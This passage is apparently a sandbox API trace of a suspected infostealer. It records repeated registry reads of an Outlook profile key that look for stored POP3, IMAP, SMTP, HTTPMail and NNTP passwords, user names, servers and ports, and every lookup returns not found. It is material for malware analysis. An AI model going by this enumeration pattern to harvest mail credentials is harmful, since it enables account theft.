RegCloseKey (hKey=0x944) returned 0x0 [0249.237] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.237] RegQueryValueExA (in: hKey=0x944, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.237] RegCloseKey (hKey=0x944) returned 0x0 [0249.237] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.237] RegQueryValueExA (in: hKey=0x944, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.237] RegCloseKey (hKey=0x944) returned 0x0 [0249.237] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.237] RegQueryValueExA (in: hKey=0x944, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.237] RegCloseKey (hKey=0x944) returned 0x0 [0249.237] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.237] RegQueryValueExA (in: hKey=0x944, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.237] RegCloseKey (hKey=0x944) returned 0x0 [0249.237] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.237] RegQueryValueExA (in: hKey=0x944, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.237] RegCloseKey (hKey=0x944) returned 0x0 [0249.237] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.237] RegQueryValueExA (in: hKey=0x944, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.237] RegCloseKey (hKey=0x944) returned 0x0 [0249.237] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.237] RegQueryValueExA (in: hKey=0x944, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.237] RegCloseKey (hKey=0x944) returned 0x0 [0249.237] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.237] RegQueryValueExA (in: hKey=0x944, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.237] RegCloseKey (hKey=0x944) returned 0x0 [0249.237] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.238] RegQueryValueExA (in: hKey=0x944, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.238] RegCloseKey (hKey=0x944) returned 0x0 [0249.238] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.238] RegQueryValueExA (in: hKey=0x944, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.238] RegCloseKey (hKey=0x944) returned 0x0 [0249.238] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.238] RegQueryValueExA (in: hKey=0x944, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.238] RegCloseKey (hKey=0x944) returned 0x0 [0249.238] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.238] RegQueryValueExA (in: hKey=0x944, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.238] RegCloseKey (hKey=0x944) returned 0x0 [0249.238] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.238] RegQueryValueExA (in: hKey=0x944, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.238] RegCloseKey (hKey=0x944) returned 0x0 [0249.238] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.238] RegQueryValueExA (in: hKey=0x944, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.238] RegCloseKey (hKey=0x944) returned 0x0 [0249.238] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.238] RegQueryValueExA (in: hKey=0x944, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.238] RegCloseKey (hKey=0x944) returned 0x0 [0249.238] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dd08 | out: phkResult=0x1c4dd08*=0x944) returned 0x0 [0249.238] RegQueryValueExA (in: hKey=0x944, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4dcf8, lpData=0x1c4dcf0, lpcbData=0x1c4dd00*=0x4 | out: lpType=0x1c4dcf8*=0x0, lpData=0x1c4dcf0*=0x0, lpcbData=0x1c4dd00*=0x4) returned 0x2 [0249.238] RegCloseKey (hKey=0x944) returned 0x0 [0249.238] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dd08 | out: phkResult=0x1c4dd08*=0x944) returned 0x0 [0249.238] RegQueryValueExA (in: hKey=0x944, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4dcf8, lpData=0x1c4dcf0, lpcbData=0x1c4dd00*=0x4 | out: lpType=0x1c4dcf8*=0x0, lpData=0x1c4dcf0*=0x0, lpcbData=0x1c4dd00*=0x4) returned 0x2 [0249.238] RegCloseKey (hKey=0x944) returned 0x0 [0249.239] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dd08 | out: phkResult=0x1c4dd08*=0x944) returned 0x0 [0249.239] RegQueryValueExA (in: hKey=0x944, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4dcf8, lpData=0x1c4dcf0, lpcbData=0x1c4dd00*=0x4 | out: lpType=0x1c4dcf8*=0x0, lpData=0x1c4dcf0*=0x0, lpcbData=0x1c4dd00*=0x4) returned 0x2 [0249.239] RegCloseKey (hKey=0x944) returned 0x0 [0249.239] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.239] RegQueryValueExA (in: hKey=0x944, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.239] RegCloseKey (hKey=0x944) returned 0x0 [0249.239] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.239] RegQueryValueExA (in: hKey=0x944, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.239] RegCloseKey (hKey=0x944) returned 0x0 [0249.239] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.239] RegQueryValueExA (in: hKey=0x944, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.239] RegCloseKey (hKey=0x944) returned 0x0 [0249.239] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.239] RegQueryValueExA (in: hKey=0x944, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.239] RegCloseKey (hKey=0x944) returned 0x0 [0249.239] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.239] RegQueryValueExA (in: hKey=0x944, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.239] RegCloseKey (hKey=0x944) returned 0x0 [0249.239] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.239] RegQueryValueExA (in: hKey=0x944, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.239] RegCloseKey (hKey=0x944) returned 0x0 [0249.239] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.239] RegQueryValueExA (in: hKey=0x944, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.239] RegCloseKey (hKey=0x944) returned 0x0 [0249.239] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.239] RegQueryValueExA (in: hKey=0x944, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.239] RegCloseKey (hKey=0x944) returned 0x0 [0249.240] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.240] RegQueryValueExA (in: hKey=0x944, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.240] RegCloseKey (hKey=0x944) returned 0x0 [0249.240] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.240] RegQueryValueExA (in: hKey=0x944, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.240] RegCloseKey (hKey=0x944) returned 0x0 [0249.240] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.240] RegQueryValueExA (in: hKey=0x944, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.240] RegCloseKey (hKey=0x944) returned 0x0 [0249.240] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.240] RegQueryValueExA (in: hKey=0x944, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.240] RegCloseKey (hKey=0x944) returned 0x0 [0249.240] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.240] RegQueryValueExA (in: hKey=0x944, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.240] RegCloseKey (hKey=0x944) returned 0x0 [0249.240] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.240] RegQueryValueExA (in: hKey=0x944, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.240] RegCloseKey (hKey=0x944) returned 0x0 [0249.240] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.240] RegQueryValueExA (in: hKey=0x944, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.240] RegCloseKey (hKey=0x944) returned 0x0 [0249.240] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.240] RegQueryValueExA (in: hKey=0x944, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.240] RegCloseKey (hKey=0x944) returned 0x0 [0249.240] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.241] RegQueryValueExA (in: hKey=0x944, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.241] RegCloseKey (hKey=0x944) returned 0x0 [0249.241] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.241] RegQueryValueExA (in: hKey=0x944, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.241] RegCloseKey (hKey=0x944) returned 0x0 [0249.241] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.241] RegQueryValueExA (in: hKey=0x944, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.241] RegCloseKey (hKey=0x944) returned 0x0 [0249.241] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.241] RegQueryValueExA (in: hKey=0x944, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.241] RegCloseKey (hKey=0x944) returned 0x0 [0249.241] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.241] RegQueryValueExA (in: hKey=0x944, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.241] RegCloseKey (hKey=0x944) returned 0x0 [0249.241] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.241] RegQueryValueExA (in: hKey=0x944, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.241] RegCloseKey (hKey=0x944) returned 0x0 [0249.241] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.241] RegQueryValueExA (in: hKey=0x944, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.241] RegCloseKey (hKey=0x944) returned 0x0 [0249.241] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.242] RegQueryValueExA (in: hKey=0x944, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.242] RegCloseKey (hKey=0x944) returned 0x0 [0249.242] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.242] RegQueryValueExA (in: hKey=0x944, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.242] RegCloseKey (hKey=0x944) returned 0x0 [0249.242] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.242] RegQueryValueExA (in: hKey=0x944, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.242] RegCloseKey (hKey=0x944) returned 0x0 [0249.280] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.280] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.280] RegCloseKey (hKey=0x948) returned 0x0 [0249.280] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.280] RegQueryValueExA 